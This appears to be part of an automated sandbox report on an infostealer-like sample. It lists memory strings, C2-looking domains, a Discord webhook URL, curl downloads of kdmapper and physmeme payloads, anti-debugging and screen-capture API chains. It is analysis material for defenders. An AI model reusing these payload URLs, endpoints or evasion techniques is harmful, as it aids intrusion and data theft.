                                Source: msedge.exe, 0000002A.00000002.1821903588.0000000000E0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic(L
                                Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000025.00000002.1806078775.00000194D5928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.co
                                Source: powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000024.00000002.1852018210.000001AF6E530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                                Source: powershell.exe, 00000024.00000002.1569280985.000001AF00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1569280985.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD761000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 00000024.00000002.1569280985.000001AF00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                Source: powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: NCTSgL4t0B.exeString found in binary or memory: http://www.houseindustries.com/license
                                Source: NCTSgL4t0B.exeString found in binary or memory: http://www.houseindustries.com/licenseBurbank
                                Source: NCTSgL4t0B.exeString found in binary or memory: http://www.houseindustries.com/licenseCopyright
                                Source: NCTSgL4t0B.exeString found in binary or memory: http://www.houseindustries.comhttp://www.talleming.comHouse
                                Source: powershell.exe, 00000025.00000002.1820619216.00000194D5B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                Source: msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top
                                Source: Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top/
                                Source: msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
                                Source: powershell.exe, 00000024.00000002.1569280985.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.c
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appleboltelwk.shop:443/api
                                Source: NCTSgL4t0B.exeString found in binary or memory: https://auth.gg/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.c
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
                                Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coursedonnyre.shop:443/api
                                Source: NCTSgL4t0B.exeString found in binary or memory: https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO
                                Source: curl.exe, 0000000A.00000002.1305246511.0000013FD8180000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305246511.0000013FD8189000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304872515.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304898793.0000013FD8193000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304965327.0000013FD8196000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304773710.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305291488.0000013FD8196000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305347033.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
                                Source: curl.exe, 0000000A.00000003.1304872515.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304773710.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305347033.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin$h
                                Source: curl.exe, 0000000A.00000002.1305246511.0000013FD8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
                                Source: curl.exe, 0000000A.00000002.1305246511.0000013FD8189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin6&
                                Source: curl.exe, 0000000E.00000003.1325480427.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
                                Source: curl.exe, 0000000E.00000002.1325740592.000001EBAEA00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
                                Source: curl.exe, 0000000E.00000003.1325302112.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1325850619.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325227642.000001EBAEA39000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325480427.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binN
                                Source: curl.exe, 0000000E.00000003.1325345916.000001EBAEA13000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325527057.000001EBAEA16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binapi.dll
                                Source: curl.exe, 0000000E.00000002.1325740592.000001EBAEA08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binc/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fossillargeiw.shop:443/api
                                Source: powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.co
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                Source: powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/(
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/api
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/apiWL3
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/le
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/ty
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site:443/apip
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900(
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-Au
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.7:49706 version: TLS 1.2
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB2A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memmove,free,GlobalUnlock,CloseClipboard,0_2_00007FF735DB2A90
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB2CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF735DB2CE0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB2A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memmove,free,GlobalUnlock,CloseClipboard,0_2_00007FF735DB2A90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,19_2_00438E3C
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DDD840 pow,pow,pow,sqrt,_invalid_parameter_noinfo_noreturn,pow,pow,sqrt,memchr,memchr,memchr,memchr,memchr,memchr,memchr,memchr,SendInput,GetAsyncKeyState,_invalid_parameter_noinfo_noreturn,0_2_00007FF735DDD840

                                System Summary

                                barindex
                                Source: physmeme.exe.14.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 360448
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4760
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD604D ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD604D
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DE8310: DeviceIoControl,0_2_00007FF735DE8310
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD43000_2_00007FF735DD4300
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF00_2_00007FF735DD4BF0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD47600_2_00007FF735DD4760
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD2F100_2_00007FF735DD2F10
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DBA2F00_2_00007FF735DBA2F0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DEBAEC0_2_00007FF735DEBAEC
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB6ED00_2_00007FF735DB6ED0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD76D00_2_00007FF735DD76D0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DC76800_2_00007FF735DC7680
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB0E800_2_00007FF735DB0E80
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DAE6800_2_00007FF735DAE680
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DC16900_2_00007FF735DC1690
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DC3A700_2_00007FF735DC3A70
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DCEA700_2_00007FF735DCEA70
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB92500_2_00007FF735DB9250
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DC2E500_2_00007FF735DC2E50
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DC52200_2_00007FF735DC5220
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB5DF00_2_00007FF735DB5DF0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DC65D00_2_00007FF735DC65D0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DDEDD00_2_00007FF735DDEDD0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD0D800_2_00007FF735DD0D80
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DC59900_2_00007FF735DC5990
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB09600_2_00007FF735DB0960
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DCA1600_2_00007FF735DCA160
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DB85700_2_00007FF735DB8570
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DBC5500_2_00007FF735DBC550
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DA24F00_2_00007FF735DA24F0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DBF8F00_2_00007FF735DBF8F0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DEA0C00_2_00007FF735DEA0C0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DCE4B00_2_00007FF735DCE4B0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DAF4800_2_00007FF735DAF480
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DBD4700_2_00007FF735DBD470
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DAB8750_2_00007FF735DAB875
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DBA0400_2_00007FF735DBA040
